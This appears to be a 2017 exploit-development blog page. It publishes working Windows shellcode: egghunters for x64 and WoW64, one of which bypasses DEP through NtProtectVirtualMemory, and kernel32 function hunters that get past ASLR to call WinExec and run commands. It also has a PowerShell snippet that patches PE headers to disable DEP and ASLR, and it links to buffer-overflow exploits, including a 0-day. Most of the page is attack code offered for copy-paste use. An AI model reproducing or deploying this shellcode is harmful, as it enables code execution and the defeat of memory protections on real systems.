Pure Windows 10 Pro 64bit egghunter, with enforced DEP evasion- using NtProtectVirtualMemory

2017-04-05

For the full documentation, click here

MASM x64 assembly

PUBLIC Win10egghunterx64

.code

Win10egghunterx64 PROC

_start:
    push 7fh
    pop rdi                               ; RDI is nonvolatile, so it will be preserved after syscalls

_setup:                   
    inc rdi                                ; parameter 1 - lpAddress - counter
    mov r9b,40h                      ; parameter 3 - flNewProtect - 0x40 PAGE_EXECUTE_READWRITE                           
    pop rsi                                ; Stack alignment before the stack setup
    pop rsi    
    push rdi                            
    push rsp
    pop rdx                                ; pointer to lpAddress
    push 08h                            ; parameter 2 - dwSize 0x1
    push rsp
    pop r8                                ; pointer to dwSize going to r8 - can be exchanged with mov r8,rsp 
    mov [rdx+20h],rsp             ; parameter 4 - lpflOldprotect                     
    dec r10                                ; parameter 5 - hProcess - the handle will be -1, if not set you'll get a c0000008 error                              
_VirtualProtectEx:
    
    push 50h                            ; 0x50h for Windows 10 and Windows Server 2016 x64, 0x4Dh for Windows 7 family
    pop rax
    syscall

_rc_check:

    cmp al,01h                            ; check the response for non-allocated memory
    jge _setup

_end:                                    ; There won't be too many of these eggs in the memory
    
    mov eax, 042303042h                    ; the egg
    scasd
    jnz _setup
    jmp rdi

Win10egghunterx64 ENDP
END

Finally putting an egghunter to work on a Windows 10 Pro x64

2017-02-22

CVE-2017-6187 - Disk Savvy Enterprise 9.4.18 - Buffer Overflow  SEH exploit with WoW64 egghunters.

https://www.exploit-db.com/exploits/41436/

The exploit contains a longer version of this egghunter, but you can exchange it anytime with this shorter 45 bytes one. I have tested it, and it works properly.

The Windows 10 Pro x64 Wow64 egghunter assembly code as of 2017-02-22:

[BITS 32]

_start:
        xor edx,edx    
        or dx, 0x0fff
        xor ebx,ebx
        inc edx
        push edx   
        push ebx  
        push ebx   
        push ebx 
        mov bl,0xc0  

egg_64:
        push 0x29        ;call to auditandcheck Windows 10 and Win Server 2016 specific
        pop eax
        call dword [fs:ebx]    ;jmp far to 33:WoW64
        add esp, 0xc     ; Windows 10 specific adjustment
        pop edx

egg_end:
        cmp al,0x5        ;generic egghunter
        je _start + 7
        mov eax, 0x77303074
        mov edi,edx
        scasd
        jnz  _start + 7
        scasd
        jnz _start + 7
        jmp edi


A quick no-brainer - direct EIP overwrite and CALL ESP

2017-01-16

WinaXe Plus 8.7 - lpr remote buffer overflow

The exploit is available here

Exploiting the unexploitable - input field buffer overflow and code execution

aSc Timetables 2017 - 0day

2017-01-12

The documentation of the exploit development can be found here

The raw assembly and python exploit code can be found here

Powershell - Disabling DEP (nx) and ASLR for dlls and executables (32 bit & 64 bit Windows)

2017-01-09

The file you modify must not be running or loaded by an application. Crash it first and run the script ;)

$f=[io.file]::readallbytes("c:\SAPlpd.exe")
$h=-join ($f[0..999]|%{"{0:X2}"-f $_ })  #join only the first 1000 byte as hex
$o=$h.IndexOf("5045")    # search for PE header's position
$f[$o/2+94]=0x00         # disable ASLR
$f[$o/2+95]=0x80         # disable DEP
sc -en by c:\SAPlpd.exe -va $f
Factory executable (bottom of the pic), ASLR,Rebase, NX enabled

ASLR,Rebase, NX disabled

Windows function() hunter for Windows 10 Pro x64 and Windows Server 2016 x64

Published on 2017-01-06

Microsoft modified something again with the main function which is the heart of this hunter, so I had to create a new version for Win 10 and Win Server 2016. You can find the PoC below with a lengthy shellcode. I will let your creativity work from this point.

This example has a more realistic shellcode. It is 118 bytes in total from which the skeleton is 45 bytes.

I generated the same command (windows/exec payload) with msfvenom and the 32bit version without \x00s is 254 bytes, the 64bit version encoded version is 351 bytes.

[BITS 32]

; Windows kernel function hunter for ASLR and Rebase enabled x64 Windows operating systems

; Author: Peter Baris - SAPtech ERP and Pro Consulting Hungary - http://www.saptech-erp.com.au
; The skeleton is based on  Lincoln's (Corelan Team) WoW64 egghunter https://www.corelan.be/
; WinExec() parameter setup based on FuzzySecurity's tutorial - http://www.fuzzysecurity.com/


; Offsets and fingerprints: (FP - fingerprint) - these offsets and fingerprints are in kernel32.dll
; Please send me other interesting functions to be found, and I will get the fingerprints for them and a PoC code if possible

; Windows 10 Pro x64 - WinExec - offset: f7f0 - FP 1: 8B  - FP 2: +51: F9
; Windows 10 Pro x64 - VirtualProtect - offset: a3d0 - FP 1: 8b  - FP 2: +1F: CC
; Windows Server 2016 x64 - WinExec - offset: f7f0 - FP 1: 8B  - FP 2: +51: F9
; Windows Server 2016 x64- VirtualProtect - offset: a3d0 - FP 1:  8B  - FP 2: +1f: CC

_start:
        MOV EDX,0x80fff7f0 ; Address from where we start our countdown - always change the offset to the relevant one!
        XOR EBP,EBP        ;these instructions will calculate 0x00010000 in ebp and will be used for multiple purposes
        DEC BP
        INC EBP
        
stack:    
        SUB EDX,EBP    ;subtract 0x00010000 from the address in edx
        XOR EBX,EBX 
        PUSH EDX    ; stack setup - parameter 1 - address to check - actually it will be the 5th
        PUSH EBX    ; stack setup - parameter 2
        PUSH EBX    ; stack setup - parameter 3
        PUSH EBX    ; stack setup - parameter 4
        MOV BL, 0xc0    ; 0xc0 for the syscall in ebx

_syscall:
        PUSH 0x29        ; call AccessCheckAndAuditAlarm for Win 10 Pro and Windows Server 2016
        POP EAX
        CALL DWORD [FS:EBX]    ;jmp far to 33:WoW64
        ADD ESP,0xc        ; compensate the parameter setup in the stack module
        POP EDX            ; restore our checked memory pointer
        
fingerprints:
        CMP AL,0x5        ; check if the RC is access violation
        JE stack        ; if we got access denied - go get the next address
        CMP BYTE [EDX],0x8b          ; 1st fingerprint of the Windows function to check
        JNZ  stack    ;
        CMP BYTE [EDX+0x51], 0xf9  ; 2nd fingerprint of the Windows function to check
        JNZ stack        ; if 0 we found our windows function - if not 0, jump back to counter
            
shellcode:
        PUSH EBP    ;  it ends with 0000 that is all what we need now to have a terminator character before our commandline
        push "%a  "
        push ")do "
        push "exe'"
        push "dit."
        push "bcde"
        push "/s \"
        push "ir/b"
        push " ('d"
        push "a in"
        push "/f %"
        push "for "
        push " /k "
        push "cmd "
        MOV EAX, ESP
        PUSH 1    ; I had to use PUSH 1 so you will see the command's output. This is only a query, will not disable DEP.
        PUSH EAX
        CALL EDX

Windows function() hunter for Windows Server 2012 R2 x64

Published on 2017-01-06

I think the title tells everything. A reworked WoW64 egghunter, a bit of assembly, very very long hours over WinDbg and here is the result. I think, this should also work for Windows 8.1. I hope it is copy paste friendly. This was tested on a fully patched Windows Server 2012 R2 x64.

The function() offsets and fingerprints are from kernel32.dll using arwin.exe by Steve Hanna.

The compiled code is 58 bytes in total with the PoC shellcode, the skeleton is 46 bytes long.

[BITS 32]

; Windows kernel function hunter for ASLR/Rebase enabled x64 Windows operating systems

; Author: Peter Baris - SAPtech ERP and Pro Consulting Hungary - http://www.saptech-erp.com.au
; The skeleton is based on  Lincoln's (Corelan Team) WoW64 egghunter https://www.corelan.be/
; WinExec() parameter setup based on FuzzySecurity's tutorial - http://www.fuzzysecurity.com/

; Offsets and fingerprints (FP - fingerprint; +47 means the offset from the first fingerprint's pointer)
; Windows Server 2012 R2 x64 - WinExec - offset: 2927 - FP 1: 8b  - FP 2: +47: ff
; Windows Server 2012 R2 x64 - VirtualProtect - offset: 971f - FP 1: 8b  - FP 2 +7f: 45  


_start:
        MOV edx,0xffff971f       ;our starting address ffff+function's offset 971f(-0x00010000) from where we start our search
        xor ebp,ebp
        DEC BP
        INC EBP

stack:    
        SUB EDX,EBP
        xor ebx,ebx
        push edx
        push ebx
        push ebx
        push ebx
        push ebx
        mov bl, 0xc0      
        
_syscall:        
        push 0x28        ;call to AccessCheckAndAuditAlarm()  - win 2012 specific
        pop eax        
        call dword [fs:ebx]    ;jmp far to 33:WoW64
        add esp,0x10
        pop edx
    
fingerprints:
        cmp al,0x5        ; if c0000005 (access violation)  then we jump back and get the next pointer
        je stack
        CMP BYTE [edx],0x8b    ;if rc other than c0000005 check our first fingerprint (commonly functions starts with this)
        jnz  stack                          ;if we don't have byte 8b at our pointer get the next address
        CMP BYTE [EDX+0x7f], 0x45   ; if we have 8b at our first FP, check the second one
        JNZ stack                          ; if different, get next address, but if not...roll to the shellcode
        
shellcode:
        push ebp
        push "calc"
        MOV EAX,ESP
        push ebp                  ;will make the lcmdShow 65536 but still works, however, with cmd /k it won't display a shell
        push eax
        CALL EDX

Windows function() hunter for Windows 7 Pro x64, Windows 7 Home X64 and  Windows Server 2008 R2 x64

Published on 2017-01-07


[BITS 32]

; Windows kernel function hunter for ASLR enabled x64 Windows operating systems
; Author: Peter Baris - SAPtech ERP and Pro Consulting Hungary - http://www.saptech-erp.com.au
; The skeleton is based on  Lincoln's (Corelan Team) WoW64 egghunter https://www.corelan.be/
; WinExec() parameter setup based on FuzzySecurity's tutorial - http://www.fuzzysecurity.com/


; Offsets and fingerprints: (FP - fingerprint)
; Windows 7 Home SP1 x64 - WinExec - offset: 2ff1 - FP 1: At function pointer:  0x8b  - FP 2 Function pointer +2b: 0xE8
; Windows 7 Home SP1 x64 - VirtualProtect - offset: 4327 - FP 1: 0x8b  - FP 2 +25: E8
; Windows 7 Pro SP1 x64 - WinExec - offset: 31f9 - FP 1: At function pointer:  0x8b  - FP 2 Function pointer +2b: 0xE8
; Windows 7 Pro SP1 x64 - VirtualProtect - offset: 4327 - FP 1: 0x8b  - FP 2 +2b: E8
; Windows Server 2008 R2 x64 - WinExec - offset: 31a9 - FP 1: 0x8b  - FP 2 +2b: E8
; Windows Server 2008 R2 x64 - VirtualProtect - offset: 4327 - FP 1: At function pointer address:  0x8b  - FP 2 Function pointer +25: 0xE8


_start:
    xor ebx,ebx    
    push ebx    
    mov bl,0xc0    
    MOV edx,0x78ff31a9    ; always change the offset of this address to the respective OS's function's offset
    xor ebp,ebp
    DEC BP
    INC EBP

counter:    
        SUB EDX,EBP
        push edx
        
_syscall:
        push 0x26        ; call to auditandcheck in syswow
        pop eax
        xor ecx,ecx        ; param 1
        mov edx,esp        ; param 2
        call dword [fs:ebx]    ;jmp far to 33:WoW64
        pop ecx
        pop edx

        
fingerprints:
        cmp al,0x5        ; check for rc c0000005
        je counter
        CMP BYTE [edx],0x8b
        jnz  counter
        CMP BYTE [EDX+0x25], 0xE8
        JNZ counter


            
shellcode:
        push ebp
        push "calc"
        MOV EAX,ESP
        push 1
        push eax
        CALL EDX

Copyright? Nope, just don't forget to mention from where you got the code.